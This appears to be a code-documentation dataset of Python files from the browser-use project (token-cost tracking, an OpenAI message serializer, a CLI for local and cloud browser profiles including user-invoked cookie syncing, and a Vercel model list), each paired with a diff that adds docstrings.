def add_usage(self, model: str, usage: ChatInvokeUsage) -> TokenUsageEntry:
+ """Add token usage entry to history (without calculating cost)"""
entry = TokenUsageEntry(
model=model,
timestamp=datetime.now(),
@@ -229,6 +244,7 @@ # cost_logger.debug(f'🧠 llm : {C_CYAN}{llm.model}{C_RESET} (no usage found)')
async def _log_usage(self, model: str, usage: TokenUsageEntry) -> None:
+ """Log usage to the logger"""
if not self._initialized:
await self.initialize()
@@ -253,6 +269,7 @@ cost_logger.debug(f'🧠 {C_CYAN}{model}{C_RESET} | {input_part} | {output_part}')
def _build_input_tokens_display(self, usage: ChatInvokeUsage, cost: TokenCostCalculated | None) -> str:
+ """Build a clear display of input tokens breakdown with emojis and optional costs"""
C_YELLOW = '\033[93m'
C_BLUE = '\033[94m'
C_RESET = '\033[0m'
@@ -296,6 +313,11 @@ return ' + '.join(parts)
def register_llm(self, llm: BaseChatModel) -> BaseChatModel:
+ """
+ Register an LLM to automatically track its token usage
+
+ @dev Guarantees that the same instance is not registered multiple times
+ """
# Use instance ID as key to avoid collisions between multiple instances
instance_id = str(id(llm))
@@ -339,6 +361,7 @@ return llm
def get_usage_tokens_for_model(self, model: str) -> ModelUsageTokens:
+ """Get usage tokens for a specific model"""
filtered_usage = [u for u in self.usage_history if u.model == model]
return ModelUsageTokens(
@@ -350,6 +373,7 @@ )
async def get_usage_summary(self, model: str | None = None, since: datetime | None = None) -> UsageSummary:
+ """Get summary of token usage and costs (costs calculated on-the-fly)"""
filtered_usage = self.usage_history
if model:
@@ -421,6 +445,7 @@ )
def _format_tokens(self, tokens: int) -> str:
+ """Format token count with k suffix for thousands"""
if tokens >= 1000000000:
return f'{tokens / 1000000000:.1f}B'
if tokens >= 1000000:
@@ -430,6 +455,7 @@ return str(tokens)
async def log_usage_summary(self) -> None:
+ """Log a comprehensive usage summary per model with colors and nice formatting"""
if not self.usage_history:
return
@@ -512,17 +538,21 @@ )
async def get_cost_by_model(self) -> dict[str, ModelUsageStats]:
+ """Get cost breakdown by model"""
summary = await self.get_usage_summary()
return summary.by_model
def clear_history(self) -> None:
+ """Clear usage history"""
self.usage_history = []
async def refresh_pricing_data(self) -> None:
+ """Force refresh of pricing data from GitHub"""
if self.include_cost:
await self._fetch_and_cache_pricing_data()
async def clean_old_caches(self, keep_count: int = 3) -> None:
+ """Clean up old cache files, keeping only the most recent ones"""
try:
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
@@ -543,6 +573,7 @@ logger.debug(f'Error cleaning old cache files: {e}')
async def ensure_pricing_loaded(self) -> None:
+ """Ensure pricing data is loaded in the background. Call this after creating the service."""
if not self._initialized and self.include_cost:
# This will run in the background and won't block
- await self.initialize()+ await self.initialize()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tokens/service.py |
Add docstrings for utility scripts | from typing import overload
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionContentPartImageParam,
ChatCompletionContentPartRefusalParam,
ChatCompletionContentPartTextParam,
ChatCompletionMessageFunctionToolCallParam,
ChatCompletionMessageParam,
ChatCompletionSystemMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_content_part_image_param import ImageURL
from openai.types.chat.chat_completion_message_function_tool_call_param import Function
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
ContentPartImageParam,
ContentPartRefusalParam,
ContentPartTextParam,
SystemMessage,
ToolCall,
UserMessage,
)
class OpenAIMessageSerializer:
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ChatCompletionContentPartTextParam:
return ChatCompletionContentPartTextParam(text=part.text, type='text')
@staticmethod
def _serialize_content_part_image(part: ContentPartImageParam) -> ChatCompletionContentPartImageParam:
return ChatCompletionContentPartImageParam(
image_url=ImageURL(url=part.image_url.url, detail=part.image_url.detail),
type='image_url',
)
@staticmethod
def _serialize_content_part_refusal(part: ContentPartRefusalParam) -> ChatCompletionContentPartRefusalParam:
return ChatCompletionContentPartRefusalParam(refusal=part.refusal, type='refusal')
@staticmethod
def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam]:
if isinstance(content, str):
return content
serialized_parts: list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam] = []
for part in content:
if part.type == 'text':
serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
elif part.type == 'image_url':
serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_image(part))
return serialized_parts
@staticmethod
def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | list[ChatCompletionContentPartTextParam]:
if isinstance(content, str):
return content
serialized_parts: list[ChatCompletionContentPartTextParam] = []
for part in content:
if part.type == 'text':
serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
return serialized_parts
@staticmethod
def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] | None:
if content is None:
return None
if isinstance(content, str):
return content
serialized_parts: list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] = []
for part in content:
if part.type == 'text':
serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
elif part.type == 'refusal':
serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_refusal(part))
return serialized_parts
@staticmethod
def _serialize_tool_call(tool_call: ToolCall) -> ChatCompletionMessageFunctionToolCallParam:
return ChatCompletionMessageFunctionToolCallParam(
id=tool_call.id,
function=Function(name=tool_call.function.name, arguments=tool_call.function.arguments),
type='function',
)
# endregion
# region - Serialize overloads
@overload
@staticmethod
def serialize(message: UserMessage) -> ChatCompletionUserMessageParam: ...
@overload
@staticmethod
def serialize(message: SystemMessage) -> ChatCompletionSystemMessageParam: ...
@overload
@staticmethod
def serialize(message: AssistantMessage) -> ChatCompletionAssistantMessageParam: ...
@staticmethod
def serialize(message: BaseMessage) -> ChatCompletionMessageParam:
if isinstance(message, UserMessage):
user_result: ChatCompletionUserMessageParam = {
'role': 'user',
'content': OpenAIMessageSerializer._serialize_user_content(message.content),
}
if message.name is not None:
user_result['name'] = message.name
return user_result
elif isinstance(message, SystemMessage):
system_result: ChatCompletionSystemMessageParam = {
'role': 'system',
'content': OpenAIMessageSerializer._serialize_system_content(message.content),
}
if message.name is not None:
system_result['name'] = message.name
return system_result
elif isinstance(message, AssistantMessage):
# Handle content serialization
content = None
if message.content is not None:
content = OpenAIMessageSerializer._serialize_assistant_content(message.content)
assistant_result: ChatCompletionAssistantMessageParam = {'role': 'assistant'}
# Only add content if it's not None
if content is not None:
assistant_result['content'] = content
if message.name is not None:
assistant_result['name'] = message.name
if message.refusal is not None:
assistant_result['refusal'] = message.refusal
if message.tool_calls:
assistant_result['tool_calls'] = [OpenAIMessageSerializer._serialize_tool_call(tc) for tc in message.tool_calls]
return assistant_result
else:
raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
return [OpenAIMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -26,6 +26,7 @@
class OpenAIMessageSerializer:
+ """Serializer for converting between custom message types and OpenAI message param types."""
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ChatCompletionContentPartTextParam:
@@ -46,6 +47,7 @@ def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam]:
+ """Serialize content for user messages (text and images allowed)."""
if isinstance(content, str):
return content
@@ -61,6 +63,7 @@ def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | list[ChatCompletionContentPartTextParam]:
+ """Serialize content for system messages (text only)."""
if isinstance(content, str):
return content
@@ -74,6 +77,7 @@ def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] | None:
+ """Serialize content for assistant messages (text and refusal allowed)."""
if content is None:
return None
if isinstance(content, str):
@@ -112,6 +116,7 @@
@staticmethod
def serialize(message: BaseMessage) -> ChatCompletionMessageParam:
+ """Serialize a custom message to an OpenAI message param."""
if isinstance(message, UserMessage):
user_result: ChatCompletionUserMessageParam = {
@@ -157,4 +162,4 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
- return [OpenAIMessageSerializer.serialize(m) for m in messages]+ return [OpenAIMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/serializer.py |
Write reusable docstrings |
import argparse
import json
import logging
import sys
import tempfile
from pathlib import Path
from typing import Any, Literal
from browser_use.skill_cli.commands.utils import get_sdk_client
logger = logging.getLogger(__name__)
ProfileMode = Literal['real', 'remote']
class ProfileModeError(Exception):
pass
def get_profile_mode(args: argparse.Namespace) -> ProfileMode:
from browser_use.skill_cli.install_config import is_mode_available
browser_mode = getattr(args, 'browser', None)
# Explicit mode specified
if browser_mode == 'real':
return 'real'
elif browser_mode == 'remote':
return 'remote'
elif browser_mode == 'chromium':
raise ProfileModeError(
'Profile commands are not supported in chromium mode.\n'
'Use -b real for local Chrome profiles or -b remote for cloud profiles.'
)
# No explicit mode - try to infer from install config
local_available = is_mode_available('real')
remote_available = is_mode_available('remote')
if local_available and not remote_available:
return 'real'
elif remote_available and not local_available:
return 'remote'
elif local_available and remote_available:
raise ProfileModeError(
'Both local and remote modes are available.\n'
'Specify -b real for local Chrome profiles or -b remote for cloud profiles.'
)
else:
raise ProfileModeError('No profile modes available. Run browser-use setup first.')
def handle_profile_command(args: argparse.Namespace) -> int:
command = args.profile_command
# Commands that don't need mode inference
if command is None:
_print_usage()
return 1
# For sync command, we need special handling (local → cloud)
if command == 'sync':
return _handle_sync(args)
# Get profile mode for all other commands
try:
mode = get_profile_mode(args)
except ProfileModeError as e:
print(f'Error: {e}', file=sys.stderr)
return 1
# Route to appropriate handler
if command == 'list':
return _handle_list(args, mode)
elif command == 'get':
return _handle_get(args, mode)
elif command == 'create':
return _handle_create(args, mode)
elif command == 'update':
return _handle_update(args, mode)
elif command == 'delete':
return _handle_delete(args, mode)
elif command == 'cookies':
return _handle_cookies(args, mode)
else:
_print_usage()
return 1
def _print_usage() -> None:
print('Usage: browser-use [-b real|remote] profile <command>')
print()
print('Commands:')
print(' list List profiles')
print(' get <id> Get profile details')
print(' create Create a new profile (remote only)')
print(' update <id> Update profile')
print(' delete <id> Delete profile')
print(' cookies <id> Show cookies by domain (real only)')
print(' sync Sync local profile to cloud')
print()
print('The -b flag determines which profile system to use:')
print(' -b real Local Chrome profiles')
print(' -b remote Cloud profiles (requires API key)')
# -----------------------------------------------------------------------------
# List profiles
# -----------------------------------------------------------------------------
def _handle_list(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
return _list_local_profiles(args)
else:
return _list_cloud_profiles(args)
def _list_local_profiles(args: argparse.Namespace) -> int:
profiles = list_local_chrome_profiles()
if getattr(args, 'json', False):
print(json.dumps({'profiles': profiles}))
else:
if profiles:
print('Local Chrome profiles:')
for p in profiles:
print(f' {p["id"]}: {p["name"]} ({p["email"]})')
else:
print('No Chrome profiles found')
return 0
def _list_cloud_profiles(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
page = getattr(args, 'page', 1)
page_size = getattr(args, 'page_size', 20)
try:
client = get_sdk_client()
response = client.profiles.list_profiles(page_number=page, page_size=page_size)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
# Convert to dict for JSON output
data = {
'items': [{'id': p.id, 'name': p.name} for p in response.items],
'totalItems': response.total_items,
'pageNumber': response.page_number,
'pageSize': response.page_size,
}
print(json.dumps(data))
else:
if response.items:
print(f'Cloud profiles ({len(response.items)}/{response.total_items}):')
for p in response.items:
name = p.name or 'Unnamed'
print(f' {p.id}: {name}')
else:
print('No cloud profiles found')
return 0
# -----------------------------------------------------------------------------
# Get profile
# -----------------------------------------------------------------------------
def _handle_get(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
return _get_local_profile(args)
else:
return _get_cloud_profile(args)
def _get_local_profile(args: argparse.Namespace) -> int:
profiles = list_local_chrome_profiles()
profile_id = args.id
for p in profiles:
if p['id'] == profile_id or p['name'] == profile_id:
if getattr(args, 'json', False):
print(json.dumps(p))
else:
print(f'Profile: {p["id"]}')
print(f' Name: {p["name"]}')
print(f' Email: {p["email"]}')
return 0
print(f'Error: Profile "{profile_id}" not found', file=sys.stderr)
return 1
def _get_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
profile = client.profiles.get_profile(args.id)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
data = {
'id': profile.id,
'name': profile.name,
'createdAt': profile.created_at.isoformat() if profile.created_at else None,
'updatedAt': profile.updated_at.isoformat() if profile.updated_at else None,
}
print(json.dumps(data))
else:
print(f'Profile: {profile.id}')
if profile.name:
print(f' Name: {profile.name}')
if profile.created_at:
print(f' Created: {profile.created_at.isoformat()}')
if profile.updated_at:
print(f' Updated: {profile.updated_at.isoformat()}')
return 0
# -----------------------------------------------------------------------------
# Create profile
# -----------------------------------------------------------------------------
def _handle_create(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot create local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser to create new profiles.', file=sys.stderr)
return 1
return _create_cloud_profile(args)
def _create_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
params = {}
if args.name:
params['name'] = args.name
profile = client.profiles.create_profile(**params)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'id': profile.id, 'name': profile.name}))
else:
print(f'Created profile: {profile.id}')
return 0
# -----------------------------------------------------------------------------
# Update profile
# -----------------------------------------------------------------------------
def _handle_update(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot update local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to update profiles.', file=sys.stderr)
return 1
return _update_cloud_profile(args)
def _update_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
params = {}
if args.name:
params['name'] = args.name
profile = client.profiles.update_profile(args.id, **params)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'id': profile.id, 'name': profile.name}))
else:
print(f'Updated profile: {profile.id}')
return 0
# -----------------------------------------------------------------------------
# Delete profile
# -----------------------------------------------------------------------------
def _handle_delete(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot delete local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to remove profiles.', file=sys.stderr)
return 1
return _delete_cloud_profile(args)
def _delete_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
client.profiles.delete_browser_profile(args.id)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'deleted': args.id}))
else:
print(f'Deleted profile: {args.id}')
return 0
# -----------------------------------------------------------------------------
# Cookies (local only)
# -----------------------------------------------------------------------------
def _handle_cookies(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'remote':
print('Error: Cookie listing is only available for local Chrome profiles.', file=sys.stderr)
print('Use -b real to access local profile cookies.', file=sys.stderr)
return 1
return _list_profile_cookies(args)
def _list_profile_cookies(args: argparse.Namespace) -> int:
import asyncio
from browser_use.skill_cli.sessions import create_browser_session
# Get local profiles
local_profiles = list_local_chrome_profiles()
if not local_profiles:
print('Error: No local Chrome profiles found', file=sys.stderr)
return 1
# Find the matching profile
profile_arg = args.id
selected_profile = None
for p in local_profiles:
if p['id'] == profile_arg or p['name'] == profile_arg:
selected_profile = p
break
if not selected_profile:
print(f'Error: Profile "{profile_arg}" not found', file=sys.stderr)
print('Available profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]}')
return 1
profile_id = selected_profile['id']
print(f'Loading cookies from: {selected_profile["name"]} ({selected_profile["email"]})')
async def get_cookies():
local_session = await create_browser_session('real', headed=False, profile=profile_id)
await local_session.start()
try:
cookies = await local_session._cdp_get_cookies()
return cookies
finally:
await local_session.kill()
try:
cookies = asyncio.get_event_loop().run_until_complete(get_cookies())
except RuntimeError:
cookies = asyncio.run(get_cookies())
# Group cookies by domain
domains: dict[str, int] = {}
for cookie in cookies:
domain = cookie.get('domain', 'unknown')
# Normalize domain (remove leading dot)
if domain.startswith('.'):
domain = domain[1:]
domains[domain] = domains.get(domain, 0) + 1
# Sort by count descending
sorted_domains = sorted(domains.items(), key=lambda x: x[1], reverse=True)
if getattr(args, 'json', False):
print(json.dumps({'domains': dict(sorted_domains), 'total_cookies': len(cookies)}))
else:
print(f'\nCookies by domain ({len(cookies)} total):')
for domain, count in sorted_domains[:20]: # Show top 20
print(f' {domain}: {count}')
if len(sorted_domains) > 20:
print(f' ... and {len(sorted_domains) - 20} more domains')
print('\nTo sync cookies to cloud:')
print(f' browser-use profile sync --from "{profile_id}" --domain <domain>')
return 0
# -----------------------------------------------------------------------------
# Sync (local → cloud)
# -----------------------------------------------------------------------------
def _handle_sync(args: argparse.Namespace) -> int:
import asyncio
from browser_use.skill_cli.api_key import APIKeyRequired
from browser_use.skill_cli.sessions import create_browser_session
# Get SDK client (validates API key)
try:
client = get_sdk_client()
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
# Get local profiles
local_profiles = list_local_chrome_profiles()
if not local_profiles:
print('Error: No local Chrome profiles found', file=sys.stderr)
return 1
# Determine which profile to sync
from_profile = args.from_profile
if not from_profile:
# Show available profiles and ask user to specify
print('Available local profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]} ({p["email"]})')
print()
print('Use --from to specify a profile:')
print(' browser-use profile sync --from "Default"')
print(' browser-use profile sync --from "Profile 1"')
return 1
# Find the matching profile
selected_profile = None
for p in local_profiles:
if p['id'] == from_profile or p['name'] == from_profile:
selected_profile = p
break
if not selected_profile:
print(f'Error: Profile "{from_profile}" not found', file=sys.stderr)
print('Available profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]}')
return 1
profile_id = selected_profile['id']
profile_name = selected_profile['name']
domain_filter = getattr(args, 'domain', None)
# Generate cloud profile name
cloud_name = args.name if args.name else None
if not cloud_name:
if domain_filter:
cloud_name = f'Chrome - {profile_name} ({domain_filter})'
else:
cloud_name = f'Chrome - {profile_name}'
# Use stderr for progress when JSON output is requested
json_output = getattr(args, 'json', False)
out = sys.stderr if json_output else sys.stdout
def log(msg: str) -> None:
print(msg, file=out)
if domain_filter:
log(f'Syncing: {profile_name} → {domain_filter} cookies only')
else:
log(f'Syncing: {profile_name} ({selected_profile["email"]})')
# Step 1: Create cloud profile
log(' Creating cloud profile...')
try:
cloud_profile = client.profiles.create_profile(name=cloud_name)
cloud_profile_id = cloud_profile.id
except Exception as e:
print(f'Error creating cloud profile: {e}', file=sys.stderr)
return 1
log(f' ✓ Created: {cloud_profile_id}')
def cleanup_cloud_profile() -> None:
try:
client.profiles.delete_browser_profile(cloud_profile_id)
except Exception:
pass
# Step 2: Export cookies from local profile
async def sync_cookies():
log(' Exporting cookies from local profile...')
local_session = await create_browser_session('real', headed=False, profile=profile_id)
await local_session.start()
try:
cookies = await local_session._cdp_get_cookies()
if not cookies:
return 0, 'No cookies found in local profile'
# Filter by domain if specified
if domain_filter:
cookies = [c for c in cookies if domain_filter in c.get('domain', '')]
if not cookies:
return 0, f'No cookies found for domain: {domain_filter}'
log(f' ✓ Found {len(cookies)} cookies')
# Save to temp file - convert Cookie objects to dicts for JSON serialization
cookies_file = Path(tempfile.gettempdir()) / f'browser-use-sync-{cloud_profile_id}.json'
cookies_data = [dict(c) if hasattr(c, '__dict__') else c for c in cookies]
cookies_file.write_text(json.dumps(cookies_data))
return len(cookies), str(cookies_file)
finally:
await local_session.kill()
try:
loop = asyncio.get_event_loop()
if loop.is_running():
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor() as executor:
future = executor.submit(asyncio.run, sync_cookies())
cookie_count, cookies_file = future.result()
else:
cookie_count, cookies_file = loop.run_until_complete(sync_cookies())
except RuntimeError:
cookie_count, cookies_file = asyncio.run(sync_cookies())
if cookie_count == 0:
log(f' ⚠ {cookies_file}') # cookies_file contains error message
cleanup_cloud_profile()
return 1
# Step 3: Import cookies to cloud profile
async def import_to_cloud():
log(' Importing cookies to cloud profile...')
remote_session = await create_browser_session('remote', headed=False, profile=cloud_profile_id)
await remote_session.start()
try:
cookies = json.loads(Path(cookies_file).read_text())
await remote_session._cdp_set_cookies(cookies)
return True
finally:
await remote_session.kill()
try:
loop = asyncio.get_event_loop()
if loop.is_running():
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor() as executor:
future = executor.submit(asyncio.run, import_to_cloud())
future.result()
else:
loop.run_until_complete(import_to_cloud())
except RuntimeError:
asyncio.run(import_to_cloud())
except Exception as e:
log(f' ⚠ Failed to import cookies: {e}')
cleanup_cloud_profile()
return 1
# Cleanup temp file
try:
Path(cookies_file).unlink()
except Exception:
pass
log('✓ Profile synced successfully!')
log(f' Cloud profile ID: {cloud_profile_id}')
log('')
log('To use this profile:')
log(f' browser-use -b remote --profile {cloud_profile_id} open <url>')
if json_output:
print(
json.dumps(
{
'success': True,
'profile_id': cloud_profile_id,
'cookies_synced': cookie_count,
}
)
)
return 0
# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------
def list_local_chrome_profiles() -> list[dict[str, Any]]:
import platform
# Find Chrome Local State file
system = platform.system()
if system == 'Darwin':
local_state = Path.home() / 'Library/Application Support/Google/Chrome/Local State'
elif system == 'Windows':
local_state = Path.home() / 'AppData/Local/Google/Chrome/User Data/Local State'
else:
local_state = Path.home() / '.config/google-chrome/Local State'
if not local_state.exists():
return []
try:
data = json.loads(local_state.read_text())
profiles_info = data.get('profile', {}).get('info_cache', {})
profiles = []
for profile_id, info in profiles_info.items():
profiles.append(
{
'id': profile_id,
'name': info.get('name', profile_id),
'email': info.get('user_name', ''),
}
)
return profiles
except Exception:
return [] | --- +++ @@ -1,3 +1,8 @@+"""Profile management command handlers.
+
+Unified profile management that works with both local Chrome profiles and cloud profiles.
+The behavior is determined by the browser mode (-b real or -b remote).
+"""
import argparse
import json
@@ -16,11 +21,23 @@
class ProfileModeError(Exception):
+ """Raised when profile mode cannot be determined or is invalid."""
pass
def get_profile_mode(args: argparse.Namespace) -> ProfileMode:
+ """Determine profile mode from -b flag or install config.
+
+ Args:
+ args: Parsed command-line arguments with browser attribute
+
+ Returns:
+ 'real' for local Chrome profiles, 'remote' for cloud profiles
+
+ Raises:
+ ProfileModeError: If mode cannot be determined or chromium mode is used
+ """
from browser_use.skill_cli.install_config import is_mode_available
browser_mode = getattr(args, 'browser', None)
@@ -54,6 +71,10 @@
def handle_profile_command(args: argparse.Namespace) -> int:
+ """Handle profile subcommands.
+
+ Routes to local or cloud implementation based on browser mode.
+ """
command = args.profile_command
# Commands that don't need mode inference
@@ -91,6 +112,7 @@
def _print_usage() -> None:
+ """Print profile command usage."""
print('Usage: browser-use [-b real|remote] profile <command>')
print()
print('Commands:')
@@ -113,6 +135,7 @@
def _handle_list(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile list' command."""
if mode == 'real':
return _list_local_profiles(args)
else:
@@ -120,6 +143,7 @@
def _list_local_profiles(args: argparse.Namespace) -> int:
+ """List local Chrome profiles."""
profiles = list_local_chrome_profiles()
if getattr(args, 'json', False):
@@ -136,6 +160,7 @@
def _list_cloud_profiles(args: argparse.Namespace) -> int:
+ """List cloud profiles."""
from browser_use.skill_cli.api_key import APIKeyRequired
page = getattr(args, 'page', 1)
@@ -178,6 +203,7 @@
def _handle_get(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile get <id>' command."""
if mode == 'real':
return _get_local_profile(args)
else:
@@ -185,6 +211,7 @@
def _get_local_profile(args: argparse.Namespace) -> int:
+ """Get local Chrome profile details."""
profiles = list_local_chrome_profiles()
profile_id = args.id
@@ -203,6 +230,7 @@
def _get_cloud_profile(args: argparse.Namespace) -> int:
+ """Get cloud profile details."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -241,6 +269,7 @@
def _handle_create(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile create' command."""
if mode == 'real':
print('Error: Cannot create local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser to create new profiles.', file=sys.stderr)
@@ -250,6 +279,7 @@
def _create_cloud_profile(args: argparse.Namespace) -> int:
+ """Create a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -279,6 +309,7 @@
def _handle_update(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile update <id>' command."""
if mode == 'real':
print('Error: Cannot update local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to update profiles.', file=sys.stderr)
@@ -288,6 +319,7 @@
def _update_cloud_profile(args: argparse.Namespace) -> int:
+ """Update a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -317,6 +349,7 @@
def _handle_delete(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile delete <id>' command."""
if mode == 'real':
print('Error: Cannot delete local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to remove profiles.', file=sys.stderr)
@@ -326,6 +359,7 @@
def _delete_cloud_profile(args: argparse.Namespace) -> int:
+ """Delete a cloud profile."""
from browser_use.skill_cli.api_key import APIKeyRequired
try:
@@ -352,6 +386,7 @@
def _handle_cookies(args: argparse.Namespace, mode: ProfileMode) -> int:
+ """Handle 'profile cookies <id>' command."""
if mode == 'remote':
print('Error: Cookie listing is only available for local Chrome profiles.', file=sys.stderr)
print('Use -b real to access local profile cookies.', file=sys.stderr)
@@ -361,6 +396,7 @@
def _list_profile_cookies(args: argparse.Namespace) -> int:
+ """List cookies by domain in a local Chrome profile."""
import asyncio
from browser_use.skill_cli.sessions import create_browser_session
@@ -436,6 +472,7 @@
def _handle_sync(args: argparse.Namespace) -> int:
+ """Handle 'profile sync' command - sync local profile to cloud."""
import asyncio
from browser_use.skill_cli.api_key import APIKeyRequired
@@ -520,6 +557,7 @@ log(f' ✓ Created: {cloud_profile_id}')
def cleanup_cloud_profile() -> None:
+ """Delete the cloud profile on failure."""
try:
client.profiles.delete_browser_profile(cloud_profile_id)
except Exception:
@@ -632,6 +670,7 @@
def list_local_chrome_profiles() -> list[dict[str, Any]]:
+ """List local Chrome profiles from the Local State file."""
import platform
# Find Chrome Local State file
@@ -661,4 +700,4 @@ )
return profiles
except Exception:
- return []+ return []
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/profile.py |
Help me add docstrings to my project | import json
import os
from collections.abc import Mapping
from dataclasses import dataclass, field
from typing import Any, Literal, TypeAlias, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared_params.response_format_json_schema import (
JSONSchema,
ResponseFormatJSONSchema,
)
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage, ContentPartTextParam, SystemMessage
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.vercel.serializer import VercelMessageSerializer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
ChatVercelModel: TypeAlias = Literal[
'alibaba/qwen-3-14b',
'alibaba/qwen-3-235b',
'alibaba/qwen-3-30b',
'alibaba/qwen-3-32b',
'alibaba/qwen3-235b-a22b-thinking',
'alibaba/qwen3-coder',
'alibaba/qwen3-coder-30b-a3b',
'alibaba/qwen3-coder-next',
'alibaba/qwen3-coder-plus',
'alibaba/qwen3-embedding-0.6b',
'alibaba/qwen3-embedding-4b',
'alibaba/qwen3-embedding-8b',
'alibaba/qwen3-max',
'alibaba/qwen3-max-preview',
'alibaba/qwen3-max-thinking',
'alibaba/qwen3-next-80b-a3b-instruct',
'alibaba/qwen3-next-80b-a3b-thinking',
'alibaba/qwen3-vl-instruct',
'alibaba/qwen3-vl-thinking',
'alibaba/qwen3.5-flash',
'alibaba/qwen3.5-plus',
'alibaba/wan-v2.5-t2v-preview',
'alibaba/wan-v2.6-i2v',
'alibaba/wan-v2.6-i2v-flash',
'alibaba/wan-v2.6-r2v',
'alibaba/wan-v2.6-r2v-flash',
'alibaba/wan-v2.6-t2v',
'amazon/nova-2-lite',
'amazon/nova-lite',
'amazon/nova-micro',
'amazon/nova-pro',
'amazon/titan-embed-text-v2',
'anthropic/claude-3-haiku',
'anthropic/claude-3-opus',
